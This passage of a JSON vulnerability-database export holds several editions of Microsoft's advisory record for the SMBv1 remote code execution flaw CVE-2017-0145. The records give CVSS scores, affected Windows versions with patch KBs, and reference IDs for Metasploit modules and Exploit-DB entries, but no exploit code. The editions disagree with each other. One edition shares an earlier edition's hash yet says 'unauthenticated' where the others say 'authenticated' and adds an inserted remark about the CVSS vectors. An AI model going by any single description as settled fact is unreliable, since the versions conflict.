"KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": 
"KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, 
"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", 
"idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4014077", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": 
"Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server (consistent with the Au:N / PR:N values in this record's CVSS vectors).\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
